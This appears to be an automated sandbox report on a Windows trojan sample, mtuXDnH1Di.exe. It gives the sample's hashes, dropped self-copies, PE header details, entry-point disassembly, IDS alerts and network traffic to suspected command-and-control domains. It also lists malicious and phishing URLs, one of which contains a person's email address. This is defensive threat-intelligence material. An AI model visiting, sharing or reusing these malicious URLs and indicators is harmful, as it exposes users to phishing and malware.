34.246.200.160 | vzPAucRnt7.exe | Get hash | malicious | Unknown | Browse
• thoughtbranch.net/index.php
34.246.200.160 | vzPAucRnt7.exe | Get hash | malicious | Unknown | Browse
• thoughtbranch.net/index.php
34.246.200.160 | 7sAylAXBOb.exe | Get hash | malicious | Unknown | Browse
• figurewithout.net/index.php
34.246.200.160 | 7sAylAXBOb.exe | Get hash | malicious | Unknown | Browse
• figurewithout.net/index.php
34.246.200.160 | 5a5O0c0oJP.exe | Get hash | malicious | Unknown | Browse
• figurewithout.net/index.php
34.246.200.160 | 5a5O0c0oJP.exe | Get hash | malicious | Unknown | Browse
• figurewithout.net/index.php
                                                                                                                                                                                                          Jla3M8Fe16.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • figurewithout.net/index.php
                                                                                                                                                                                                          35.164.78.200vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • memberreceive.net/index.php
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • memberreceive.net/index.php
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| membertrust.net | vzPAucRnt7.exe | malicious | Unknown | 3.33.130.190 |
| | vzPAucRnt7.exe | malicious | Unknown | 3.33.130.190 |
| watersystem.net | vzPAucRnt7.exe | malicious | Unknown | 64.190.63.222 |
| | vzPAucRnt7.exe | malicious | Unknown | 64.190.63.222 |
| memberreceive.net | vzPAucRnt7.exe | malicious | Unknown | 35.164.78.200 |
| | vzPAucRnt7.exe | malicious | Unknown | 35.164.78.200 |
| partybelieve.net | vzPAucRnt7.exe | malicious | Unknown | 15.197.192.55 |
| | vzPAucRnt7.exe | malicious | Unknown | 15.197.192.55 |
| crowdtrust.net | vzPAucRnt7.exe | malicious | Unknown | 170.187.200.48 |
| | vzPAucRnt7.exe | malicious | Unknown | 170.187.200.48 |
| thoughtsystem.net | vzPAucRnt7.exe | malicious | Unknown | 213.171.195.105 |
| | vzPAucRnt7.exe | malicious | Unknown | 213.171.195.105 |
| womanbelieve.net | vzPAucRnt7.exe | malicious | Unknown | 15.197.142.173 |
| | vzPAucRnt7.exe | malicious | Unknown | 15.197.142.173 |
| womanhonor.net | vzPAucRnt7.exe | malicious | Unknown | 54.244.188.177 |
| | vzPAucRnt7.exe | malicious | Unknown | 54.244.188.177 |
| partygeneral.net | vzPAucRnt7.exe | malicious | Unknown | 3.33.130.190 |
| | vzPAucRnt7.exe | malicious | Unknown | 3.33.130.190 |
| membersystem.net | vzPAucRnt7.exe | malicious | Unknown | 85.13.130.3 |
| | vzPAucRnt7.exe | malicious | Unknown | 85.13.130.3 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| AMAZON-02US | Exv453QQIX.exe | malicious | FormBook | 76.223.105.230 |
| | OneDriveSetup.exe | malicious | ZTrat | 3.126.224.214 |
| | vzPAucRnt7.exe | malicious | Unknown | 54.244.188.177 |
| | Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | 76.223.67.189 |
| | http://verizonwireless-employmentvalidation.com | malicious | Unknown | 3.124.93.206 |
| | UjCrfOAkJJiZyZh.exe | malicious | FormBook, PureLog Stealer | 75.2.115.196 |
| | vzPAucRnt7.exe | malicious | Unknown | 54.244.188.177 |
| | .exe | malicious | Unknown | 52.42.85.34 |
| | http://beonlineboo.com | malicious | Unknown | 35.165.37.251 |
| | https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3D | malicious | Unknown | 99.81.213.111 |
| TIMEWEB-ASRU | Runtime Broker.exe | malicious | DCRat | 185.114.247.170 |
| | r6KYedz4VQ.exe | malicious | DCRat | 185.114.247.170 |
| | Gz3zPqMdtn.exe | malicious | DCRat | 185.114.247.170 |
| | cnGgzU2rkd.exe | malicious | DCRat | 185.114.247.170 |
| | https://diigo.com/0wzrly?ID=QtERFQmXrhNlWxfeW9PbYZfS3+Email=ambre.boyon@gerflor.com | malicious | Unknown | 188.225.39.170 |
| | 5F6Ny9UaKt.exe | malicious | DCRat | 185.114.247.170 |
| | LisectAVT_2403002C_62.dll | malicious | Emotet | 188.225.32.231 |
| | qqMLbietPf.exe | malicious | DCRat | 185.114.247.170 |
| | Reference ID6f5f047b6cdf41716e164ec64879e463.eml | malicious | HTMLPhisher | 185.114.245.110 |
| | https://sites.google.com/view/dcnoterialsecu/accueil | malicious | Unknown | 92.53.96.121 |
| AMAZON-02US | Exv453QQIX.exe | malicious | FormBook | 76.223.105.230 |
| | OneDriveSetup.exe | malicious | ZTrat | 3.126.224.214 |
| | vzPAucRnt7.exe | malicious | Unknown | 54.244.188.177 |
| | Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | 76.223.67.189 |
| | http://verizonwireless-employmentvalidation.com | malicious | Unknown | 3.124.93.206 |
| | UjCrfOAkJJiZyZh.exe | malicious | FormBook, PureLog Stealer | 75.2.115.196 |
| | vzPAucRnt7.exe | malicious | Unknown | 54.244.188.177 |
| | .exe | malicious | Unknown | 52.42.85.34 |
| | http://beonlineboo.com | malicious | Unknown | 35.165.37.251 |
| | https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3D | malicious | Unknown | 99.81.213.111 |
| TANDEMUS | vzPAucRnt7.exe | malicious | Unknown | 15.197.192.55 |
| | vzPAucRnt7.exe | malicious | Unknown | 15.197.192.55 |
| | https://berobv.nl/ | malicious | Unknown | 15.197.193.217 |
| | https://myallsouth.com/privacy-policy/ | malicious | Unknown | 15.197.193.217 |
| | http://www.gouv-link.com/reglement | malicious | Unknown | 15.197.130.221 |
| | https://heyflow.id/new-document-share-with-you | malicious | HTMLPhisher | 15.197.193.217 |
| | QLLafoDdqv.exe | malicious | FormBook | 15.197.172.60 |
| | https://www.globalepic.co.kr/view.php?ud=202408011057515744edd3030223_29 | malicious | Unknown | 15.197.193.217 |
| | http://telstra-103141.weeblysite.com/ | malicious | Unknown | 15.197.193.217 |
| | http://telstra-107250.weeblysite.com/ | malicious | HTMLPhisher | 15.197.193.217 |
Process: C:\Users\user\Desktop\mtuXDnH1Di.exe
File Type: data
Category: dropped
Size (bytes): 7
Entropy (8bit): 2.5216406363433186
Encrypted: false
SSDEEP: 3:zon:8
MD5: 68678699ABEA681A3BEF7BC9C04AA0DB
SHA1: 645AEBCE823CBFA211ECD2FA4878A586CC4ABE8E
SHA-256: 10F46E566F4A87C8973338326C4C0E497E0920983CCFE6BA82F734B5A00C3C64
SHA-512: 7D197C701C93120144A167E7AF27009583D56D80DF9861DE0897C4E16A45AE12B94457EA048D4D4C3978E6EF32EED3B49185356B201E282B955C8FD80713ED94
Malicious: false
Reputation: low
Preview (non-printable bytes shown as dots): ..dd..b
Process: C:\whfkpbh\idtpqzltyfy.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 279552
Entropy (8bit): 7.1352696053252345
Encrypted: false
SSDEEP: 6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
MD5: E4B47C06B5EED80FB44CFEA757525634
SHA1: 78B5133CD84E3D89EBCA4B36F33273DF6E70C3F4
SHA-256: 475C13AE1D446C61824315961E5838916AC4A3F28BC441AA8A2B39B81383EA4A
SHA-512: BEF0195A513A28E7C9868BCA359A4F1726C9F8D15204B743C0E2467E6F6C68A67994E737C82997FEF0C2BB9DCFC206100A0A52E756D286FBAF1E56D2E04E7843
Malicious: true
Antivirus:
• Avira, detection: 100%
• Joe Sandbox ML, detection: 100%
• ReversingLabs, detection: 92%
Reputation: low
Note: size and all four hashes are identical to the submitted sample mtuXDnH1Di.exe (see the file information below), so this dropped file is a byte-for-byte copy of the sample, written by the copy already running as C:\whfkpbh\idtpqzltyfy.exe.
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S..S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R...........E.......p....@..........................`............@....................................P....................................................................................p...............................text....Q.......R.................. ..`.rdata..(I...p...J...V..............@..@.data...,...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\mtuXDnH1Di.exe
File Type: data
Category: dropped
Size (bytes): 7
Entropy (8bit): 2.5216406363433186
Encrypted: false
SSDEEP: 3:zon:8
MD5: 68678699ABEA681A3BEF7BC9C04AA0DB
SHA1: 645AEBCE823CBFA211ECD2FA4878A586CC4ABE8E
SHA-256: 10F46E566F4A87C8973338326C4C0E497E0920983CCFE6BA82F734B5A00C3C64
SHA-512: 7D197C701C93120144A167E7AF27009583D56D80DF9861DE0897C4E16A45AE12B94457EA048D4D4C3978E6EF32EED3B49185356B201E282B955C8FD80713ED94
Malicious: false
Reputation: low
Preview (non-printable bytes shown as dots): ..dd..b
Process: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 279552
Entropy (8bit): 7.1352696053252345
Encrypted: false
SSDEEP: 6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
MD5: E4B47C06B5EED80FB44CFEA757525634
SHA1: 78B5133CD84E3D89EBCA4B36F33273DF6E70C3F4
SHA-256: 475C13AE1D446C61824315961E5838916AC4A3F28BC441AA8A2B39B81383EA4A
SHA-512: BEF0195A513A28E7C9868BCA359A4F1726C9F8D15204B743C0E2467E6F6C68A67994E737C82997FEF0C2BB9DCFC206100A0A52E756D286FBAF1E56D2E04E7843
Malicious: true
Antivirus:
• Avira, detection: 100%
• Joe Sandbox ML, detection: 100%
• ReversingLabs, detection: 92%
Reputation: low
Note: size and all four hashes are identical to the submitted sample mtuXDnH1Di.exe (see the file information below), so this is another byte-for-byte copy of the sample, written by the copy running as C:\whfkpbh\qbf30bzbv7f7qnhdav.exe.
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S..S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R...........E.......p....@..........................`............@....................................P....................................................................................p...............................text....Q.......R.................. ..`.rdata..(I...p...J...V..............@..@.data...,...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\mtuXDnH1Di.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 279552
Entropy (8bit): 7.1352696053252345
Encrypted: false
SSDEEP: 6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
MD5: E4B47C06B5EED80FB44CFEA757525634
SHA1: 78B5133CD84E3D89EBCA4B36F33273DF6E70C3F4
SHA-256: 475C13AE1D446C61824315961E5838916AC4A3F28BC441AA8A2B39B81383EA4A
SHA-512: BEF0195A513A28E7C9868BCA359A4F1726C9F8D15204B743C0E2467E6F6C68A67994E737C82997FEF0C2BB9DCFC206100A0A52E756D286FBAF1E56D2E04E7843
Malicious: true
Antivirus:
• Avira, detection: 100%
• Joe Sandbox ML, detection: 100%
• ReversingLabs, detection: 92%
Reputation: low
Note: size and all four hashes are identical to the submitted sample mtuXDnH1Di.exe (see the file information below); this is the sample writing a copy of itself, and the copies under C:\whfkpbh\ listed above are in turn written by those copies.
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S..S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R...........E.......p....@..........................`............@....................................P....................................................................................p...............................text....Q.......R.................. ..`.rdata..(I...p...J...V..............@..@.data...,...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.1352696053252345
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: mtuXDnH1Di.exe
File size: 279,552 bytes
MD5: e4b47c06b5eed80fb44cfea757525634
SHA1: 78b5133cd84e3d89ebca4b36f33273df6e70c3f4
SHA256: 475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a
SHA512: bef0195a513a28e7c9868bca359a4f1726c9f8d15204b743c0e2467e6f6c68a67994e737c82997fef0c2bb9dcfc206100a0a52e756d286fbaf1e56d2e04e7843
SSDEEP: 6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
TLSH: 98549D44CD39512ACC968EFE4ABB37B2F45E587567E915C3438431C424602F8FABA78B
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S...S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R.........
Icon Hash: 00928e8e8686b000
Entrypoint: 0x424590 (RVA 0x24590 from the 0x400000 image base)
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE (ASLR and DEP compatible; no GUARD_CF)
Time Stamp: 0x568930F7 [Sun Jan 3 14:32:23 2016 UTC] (compiler timestamp; trivially forgeable)
TLS Callbacks: none listed
CLR (.Net) Version: none (native code, not a .NET assembly)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
(OS and subsystem version 5.1: the image declares Windows XP as its minimum platform.)
Import Hash: 6f0f6728fed938390cd1a7b493280d77
Instruction
mov eax, dword ptr [0043F75Ch]
sar eax, 07h
sub eax, 0E724248h
and eax, 638AD6B6h
cmp eax, D4FE12C8h
je 00007FBADCDE5E96h
movzx ecx, word ptr [00473A94h]
or ecx, 9A29B7C6h
mov word ptr [00473A94h], cx
call 00007FBADCDE1ED3h
mov edx, dword ptr [0043F5C4h]
not edx
sub edx, 2D98DF04h
xor edx, 86D84936h
cmp edx, D7ABF1EFh
je 00007FBADCDE5E8Ch
add dword ptr [0044A8A4h], 24D523FCh
push esi
call 00007FBADCDF1677h
mov eax, dword ptr [00445EB0h]
sub eax, 13C02B78h
push 00437190h
mov dword ptr [00447688h], eax
inc dword ptr [00445EB0h]
push 00437188h
call 00007FBADCDDAC83h
fld dword ptr [0047ACD4h]
fadd qword ptr [0045F648h]
add esp, 08h
fld qword ptr [0044FAB0h]
fld qword ptr [00459DF0h]
fsubp st(2), st(0)
fsubrp st(1), st(0)
fstp qword ptr [0044FAB0h]
call 00007FBADCDF2EA9h
fld dword ptr [0047D39Ch]
mov esi, eax
fmul dword ptr [00486544h]
fld dword ptr [0047A424h]
fcomip st(0), st(1)
fstp st(0)
jbe 00007FBADCDE5E99h
dec dword ptr [00000000h]
Programming Language:
• [IMP] VS2005 build 50727
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b0e0 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8b000 | 0x9ca4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x37000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x351ea | 0x35200 | b8a604ad7d1ad7d6f5659a8bfca32505 | False | 0.6966911764705882 | data | 6.86562473291782 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x37000 | 0x4928 | 0x4a00 | 9fa4f015e03b624e77fc713f54352d1c | False | 0.8504539695945946 | COM executable for DOS | 7.1602946748436205 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3c000 | 0x4ef2c | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x8b000 | 0xa012 | 0xa200 | a9d11539c5aa2bd739792d7ebff48b74 | False | 0.6754195601851852 | data | 6.7897361685185675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
GDI32.dll | SetTextCharacterExtra, SetSystemPaletteUse, GetTextCharsetInfo, GetTextCharset, GetMapMode, GetTextColor, SetTextJustification, GetCurrentObject, GetMetaRgn, GetClipRgn, GetFontUnicodeRanges, GetTextCharacterExtra, GetSystemPaletteUse, GetFontLanguageInfo, GetStretchBltMode, GetPolyFillMode, GetObjectType, GetRandomRgn, SetTextAlign, GetNearestPaletteIndex, GetTextAlign, GetPixelFormat, GetDCBrushColor, GetBkColor, GetNearestColor, SetPixel
USER32.dll | EndPaint, GetCursor, GetDlgItem, GetMenuItemCount, SetWindowTextA, GetPropA, SendMessageA, MoveWindow, GetWindowDC, SetFocus, IsWindowUnicode, WindowFromDC, GetDC, LoadIconA, GetQueueStatus, EnableWindow, GetKeyboardType, EndDialog, GetDlgItemInt, GetInputState, CallWindowProcA, GetMenu, PostMessageA, GetMenuItemID, IsWindowEnabled, SetDlgItemTextA, GetWindowContextHelpId, CheckDlgButton, GetScrollPos, DrawTextA, GetForegroundWindow, RemovePropA, GetMenuState, BeginPaint, GetWindowLongA, ShowWindow, GetMenuContextHelpId
KERNEL32.dll | HeapAlloc, GetStdHandle, GlobalAlloc, GetModuleHandleA, GetCurrentThreadId, GetTickCount, GetLastError, GlobalSize, IsDebuggerPresent, GlobalFlags, MoveFileA, GlobalHandle, SizeofResource, IsProcessorFeaturePresent, LocalFlags, GetProcAddress, GetDriveTypeA, GetCurrentProcessId, GetFileTime, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, LockResource, GetFileType, CloseHandle, GetVersion, QueryPerformanceCounter, LoadResource, FindResourceA, DeleteFileA, GetProcessHeap
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-08-05T16:24:59.509195+0200 | UDP | 2018316 | ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses | 53 | 60261 | 1.1.1.1 | 192.168.2.7
2024-08-05T16:23:03.262802+0200 | TCP | 2815568 | ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort | 49701 | 80 | 192.168.2.7 | 35.164.78.200
2024-08-05T16:23:00.468164+0200 | TCP | 2815568 | ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort | 49700 | 80 | 192.168.2.7 | 3.33.130.190
2024-08-05T16:23:27.903814+0200 | UDP | 2018316 | ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses | 53 | 62372 | 1.1.1.1 | 192.168.2.7
2024-08-05T16:24:18.320810+0200 | TCP | 2815568 | ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort | 59623 | 80 | 192.168.2.7 | 3.33.130.190
2024-08-05T16:23:16.089201+0200 | UDP | 2018316 | ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses | 53 | 65063 | 1.1.1.1 | 192.168.2.7
2024-08-05T16:23:07.857815+0200 | TCP | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 80 | 49702 | 34.246.200.160 | 192.168.2.7
2024-08-05T16:23:07.848514+0200 | TCP | 2815568 | ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort | 49702 | 80 | 192.168.2.7 | 34.246.200.160
2024-08-05T16:23:21.358671+0200 | TCP | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 80 | 49715 | 54.244.188.177 | 192.168.2.7
2024-08-05T16:23:13.975372+0200 | TCP | 2815568 | ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort | 49708 | 80 | 192.168.2.7 | 85.13.130.3
2024-08-05T16:24:48.786301+0200 | TCP | 2815568 | ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort | 59624 | 80 | 192.168.2.7 | 35.164.78.200
2024-08-05T16:23:03.286503+0200 | TCP | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 80 | 49701 | 35.164.78.200 | 192.168.2.7
2024-08-05T16:24:48.791817+0200 | TCP | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 80 | 59624 | 35.164.78.200 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2024 16:23:00.003330946 CEST | 49700 | 80 | 192.168.2.7 | 3.33.130.190
Aug 5, 2024 16:23:00.011713982 CEST | 80 | 49700 | 3.33.130.190 | 192.168.2.7
Aug 5, 2024 16:23:00.011903048 CEST | 49700 | 80 | 192.168.2.7 | 3.33.130.190
Aug 5, 2024 16:23:00.012031078 CEST | 49700 | 80 | 192.168.2.7 | 3.33.130.190
Aug 5, 2024 16:23:00.017030001 CEST | 80 | 49700 | 3.33.130.190 | 192.168.2.7
Aug 5, 2024 16:23:00.467889071 CEST | 80 | 49700 | 3.33.130.190 | 192.168.2.7
Aug 5, 2024 16:23:00.468163967 CEST | 49700 | 80 | 192.168.2.7 | 3.33.130.190
Aug 5, 2024 16:23:00.468492985 CEST | 80 | 49700 | 3.33.130.190 | 192.168.2.7
Aug 5, 2024 16:23:00.468573093 CEST | 49700 | 80 | 192.168.2.7 | 3.33.130.190
Aug 5, 2024 16:23:00.474752903 CEST | 80 | 49700 | 3.33.130.190 | 192.168.2.7
Aug 5, 2024 16:23:02.490242004 CEST | 49701 | 80 | 192.168.2.7 | 35.164.78.200
Aug 5, 2024 16:23:02.497309923 CEST | 80 | 49701 | 35.164.78.200 | 192.168.2.7
Aug 5, 2024 16:23:02.497425079 CEST | 49701 | 80 | 192.168.2.7 | 35.164.78.200
Aug 5, 2024 16:23:02.497464895 CEST | 49701 | 80 | 192.168.2.7 | 35.164.78.200
Aug 5, 2024 16:23:02.502305984 CEST | 80 | 49701 | 35.164.78.200 | 192.168.2.7
Aug 5, 2024 16:23:03.262451887 CEST | 80 | 49701 | 35.164.78.200 | 192.168.2.7
Aug 5, 2024 16:23:03.262646914 CEST | 80 | 49701 | 35.164.78.200 | 192.168.2.7
Aug 5, 2024 16:23:03.262801886 CEST | 49701 | 80 | 192.168.2.7 | 35.164.78.200
Aug 5, 2024 16:23:03.281527042 CEST | 49701 | 80 | 192.168.2.7 | 35.164.78.200
Aug 5, 2024 16:23:03.286503077 CEST | 80 | 49701 | 35.164.78.200 | 192.168.2.7
Aug 5, 2024 16:23:07.082170963 CEST | 49702 | 80 | 192.168.2.7 | 34.246.200.160
Aug 5, 2024 16:23:07.088511944 CEST | 80 | 49702 | 34.246.200.160 | 192.168.2.7
Aug 5, 2024 16:23:07.088696003 CEST | 49702 | 80 | 192.168.2.7 | 34.246.200.160
Aug 5, 2024 16:23:07.088696003 CEST | 49702 | 80 | 192.168.2.7 | 34.246.200.160
Aug 5, 2024 16:23:07.095143080 CEST | 80 | 49702 | 34.246.200.160 | 192.168.2.7
Aug 5, 2024 16:23:07.847978115 CEST | 80 | 49702 | 34.246.200.160 | 192.168.2.7
Aug 5, 2024 16:23:07.848292112 CEST | 80 | 49702 | 34.246.200.160 | 192.168.2.7
Aug 5, 2024 16:23:07.848514080 CEST | 49702 | 80 | 192.168.2.7 | 34.246.200.160
Aug 5, 2024 16:23:07.848514080 CEST | 49702 | 80 | 192.168.2.7 | 34.246.200.160
Aug 5, 2024 16:23:07.857815027 CEST | 80 | 49702 | 34.246.200.160 | 192.168.2.7
Aug 5, 2024 16:23:08.690298080 CEST | 49703 | 80 | 192.168.2.7 | 15.197.142.173
Aug 5, 2024 16:23:08.695185900 CEST | 80 | 49703 | 15.197.142.173 | 192.168.2.7
Aug 5, 2024 16:23:08.695266008 CEST | 49703 | 80 | 192.168.2.7 | 15.197.142.173
Aug 5, 2024 16:23:08.695300102 CEST | 49703 | 80 | 192.168.2.7 | 15.197.142.173
Aug 5, 2024 16:23:08.700143099 CEST | 80 | 49703 | 15.197.142.173 | 192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.183926105 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.184087992 CEST4970380192.168.2.715.197.142.173
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.185036898 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.185087919 CEST4970380192.168.2.715.197.142.173
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.189647913 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.592803001 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.597723007 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.597918987 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.598023891 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.602919102 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.119362116 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.119513988 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.119585991 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.120306969 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.124830008 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.313822985 CEST4970880192.168.2.785.13.130.3
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.324901104 CEST804970885.13.130.3192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.325017929 CEST4970880192.168.2.785.13.130.3
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.325212002 CEST4970880192.168.2.785.13.130.3
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.330817938 CEST804970885.13.130.3192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.975238085 CEST804970885.13.130.3192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.975256920 CEST804970885.13.130.3192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.975372076 CEST4970880192.168.2.785.13.130.3
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.977924109 CEST4970880192.168.2.785.13.130.3
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.984775066 CEST804970885.13.130.3192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.254503965 CEST4970980192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.259618998 CEST80497093.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.259712934 CEST4970980192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.259835958 CEST4970980192.168.2.73.33.130.190
